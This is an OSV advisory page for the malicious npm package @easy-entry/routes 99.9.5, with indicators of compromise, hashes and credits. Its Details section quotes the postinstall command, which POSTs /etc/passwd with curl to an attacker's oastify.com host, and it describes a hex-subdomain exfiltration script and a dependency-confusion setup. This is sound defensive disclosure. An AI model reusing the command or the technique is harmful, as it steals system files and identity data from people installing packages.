MAL-2026-5410

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/routes/MAL-2026-5410.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5410

Published

2026-06-09T17:18:48Z

Modified

2026-06-09T18:01:29.964149945Z

Summary

Malicious code in @easy-entry/routes (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516)

On npm install, the package's postinstall hook in package.json runs curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, POSTing the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain prefixed with the installer's hostname. The same hook executes scripts/scream3gg.js, which hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues an HTTP fetch to http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, tunneling installer identity out via subdomain. The package has no legitimate functionality — it ships only the exfil payload. The scoped name @easy-entry/routes combined with an absurd 99.9.5 version is a textbook dependency-confusion shape designed to win resolution against an internal-only package of the same name.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:18:48Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "1519bae164552d25b7e45c1361d040210e637c9f8a304aa807aae7c56ce008a3",
            "id": "IN-MAL-2026-005022",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.565861237Z"
        },
        {
            "modified_time": "2026-06-09T17:18:48Z",
            "versions": [
                "99.9.5"
            ],
            "sha256": "29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516",
            "id": "IN-MAL-2026-005021",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:49.507715578Z"
        }
    ]
}

References

https://www.npmjs.com/package/@easy-entry/routes/v/99.9.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / @easy-entry/routes

Package

Name: @easy-entry/routes; View open source insights on deps.dev
Purl: pkg:npm/%40easy-entry%2Froutes

Affected ranges

Affected versions

99.*

99.9.5

Database specific

indicators

{
    "domains": [
        "7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "7363616e2d313565636264646432306339.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com",
        "2f686f6d652f7363616e.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com"
    ],
    "evidence_files": [
        {
            "sha256": "d2c42cb3e048d3dac528680c12fc15140474c725d1a99ea3d79dee1c1a403028",
            "tlsh": "ecd023b07c10c77379cd07b78128a1457d55c95f1304bd6645dfc7e4911437178eb906",
            "path": "package.json"
        },
        {
            "sha256": "9b962b07165e35cb12a1424434b1d1be779ead9b43df94af8baf0e5a1b66a6c9",
            "tlsh": "74f08ba955b11938382b50819dafd40db1e7fa0630a6e4f2fedd86810f44865bd22dde",
            "path": "scripts/scream3gg.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-VJ8f+q8rpJxjTAIowzuJI4Jk0EhTcn8Bv1S5bHUucNWd3ZK/1i1N0fL3/CBA82Mr1K7SbtJmPNiOmQP/Nl1gYQ==",
                "sha1": "1473c4cc351bd4e0d3d2404317e797fd5bb015b7"
            },
            "filename": "routes-99.9.5.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@easy-entry/routes/MAL-2026-5410.json"